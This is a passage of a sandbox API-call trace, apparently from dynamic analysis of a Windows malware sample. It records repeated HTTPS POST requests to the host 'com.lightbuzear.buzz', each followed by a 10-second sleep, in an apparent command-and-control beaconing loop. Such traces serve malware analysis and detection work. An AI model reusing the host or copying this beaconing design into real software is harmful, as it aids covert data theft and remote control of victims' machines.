lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0275.681] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0275.681] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0275.682] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0275.682] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0275.682] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0275.682] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0275.682] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0275.682] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0275.682] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0275.682] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef18 [0275.682] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0275.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef60 [0275.749] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef18 | out: hHeap=0x4780000) returned 1 [0275.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0275.749] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef60 | out: hHeap=0x4780000) returned 1 [0275.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be870 [0275.749] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0275.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0275.749] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be870 | out: hHeap=0x4780000) returned 1 [0275.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be870 [0275.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0275.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bec80 [0275.749] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0275.750] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0275.750] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0275.751] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0275.751] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bec80 | out: hHeap=0x4780000) returned 1 [0275.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0275.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0275.751] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0275.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0275.751] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0275.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0275.751] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0275.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0275.752] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0275.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef18 [0275.752] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0275.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef60 [0275.752] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef18 | out: hHeap=0x4780000) returned 1 [0275.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0275.752] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef60 | out: hHeap=0x4780000) returned 1 [0275.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bea28 [0275.752] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0275.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0275.752] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bea28 | out: hHeap=0x4780000) returned 1 [0275.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bec80 [0275.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0275.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb40 [0275.753] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0275.753] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0275.753] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0275.753] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0276.760] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb40 | out: hHeap=0x4780000) returned 1 [0276.760] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0276.760] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0276.760] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0276.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0276.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0276.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0276.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0276.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0276.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0276.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0276.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0276.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0276.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef60 [0276.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0276.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef18 [0276.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef60 | out: hHeap=0x4780000) returned 1 [0276.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0276.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef18 | out: hHeap=0x4780000) returned 1 [0276.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be960 [0276.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0276.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0276.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be960 | out: hHeap=0x4780000) returned 1 [0276.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be960 [0276.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbda0 [0276.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be898 [0276.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0276.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0276.772] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0276.772] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0276.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be898 | out: hHeap=0x4780000) returned 1 [0276.773] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0276.773] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0276.773] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0276.773] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0276.773] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0276.773] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0276.773] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0276.773] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0276.773] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0276.773] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0276.773] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef60 [0276.773] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0276.773] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef78 [0276.773] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef60 | out: hHeap=0x4780000) returned 1 [0276.773] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0276.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef78 | out: hHeap=0x4780000) returned 1 [0276.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47beb40 [0276.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0276.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0276.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb40 | out: hHeap=0x4780000) returned 1 [0276.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be898 [0276.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0276.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb40 [0276.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0276.775] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0276.775] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0276.775] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0276.775] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb40 | out: hHeap=0x4780000) returned 1 [0276.775] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0276.781] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0276.781] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0276.781] FreeLibrary (hLibModule=0x71570000) returned 1 [0276.782] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0276.782] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0276.782] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be910 | out: hHeap=0x4780000) returned 1 [0276.783] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be848 | out: hHeap=0x4780000) returned 1 [0276.783] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0276.784] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bec30 | out: hHeap=0x4780000) returned 1 [0276.784] Sleep (dwMilliseconds=0x2710) [0276.808] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0276.808] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0276.809] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0276.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0276.809] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0276.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0276.809] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0276.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0276.809] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0276.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef78 [0276.809] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0276.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed80 [0276.809] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef78 | out: hHeap=0x4780000) returned 1 [0276.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0276.809] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed80 | out: hHeap=0x4780000) returned 1 [0276.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ef18 [0276.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bec30 [0276.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bec30 | out: hHeap=0x4780000) returned 1 [0276.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0276.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be848 [0276.810] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0276.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0276.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0276.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0276.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0276.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0276.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0276.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0276.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0276.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0276.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef60 [0276.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0276.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed80 [0276.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef60 | out: hHeap=0x4780000) returned 1 [0276.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0276.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed80 | out: hHeap=0x4780000) returned 1 [0276.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bec30 [0276.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0276.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0276.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bec30 | out: hHeap=0x4780000) returned 1 [0276.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be8c0 [0276.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0276.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be910 [0276.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0276.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0276.812] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0276.812] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0276.813] FreeLibrary (hLibModule=0x71780000) returned 1 [0276.813] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be910 | out: hHeap=0x4780000) returned 1 [0276.813] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0276.813] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be9b0 [0276.813] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0276.813] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0276.813] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0276.813] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0276.813] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0276.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0276.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0276.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0276.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0276.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0276.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef78 [0276.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0276.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed80 [0276.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef78 | out: hHeap=0x4780000) returned 1 [0276.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0276.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed80 | out: hHeap=0x4780000) returned 1 [0276.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ef78 [0276.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bec30 [0276.815] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bec30 | out: hHeap=0x4780000) returned 1 [0276.815] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0276.815] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bec30 [0276.815] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0276.815] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be8e8 [0276.815] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0276.815] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0276.815] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0276.815] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0276.815] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0276.815] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0276.815] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0276.815] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0276.815] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0276.815] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed80 [0276.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0276.816] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed98 [0276.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed80 | out: hHeap=0x4780000) returned 1 [0276.816] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0276.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed98 | out: hHeap=0x4780000) returned 1 [0276.816] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ed80 [0276.816] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be910 [0276.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be910 | out: hHeap=0x4780000) returned 1 [0276.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0276.816] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0276.817] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0276.817] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0276.817] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0276.817] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0276.817] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0276.817] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0276.817] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0276.817] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0276.817] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0276.817] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f110 [0276.817] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0276.817] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f080 [0276.817] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f110 | out: hHeap=0x4780000) returned 1 [0276.817] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0276.817] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f080 | out: hHeap=0x4780000) returned 1 [0276.817] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be910 [0276.818] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0276.818] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0276.818] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be910 | out: hHeap=0x4780000) returned 1 [0276.818] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be9d8 [0276.818] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0276.818] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb40 [0276.818] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0276.819] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0276.819] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0276.819] InternetSetOptionA (hInternet=0xcc000c, 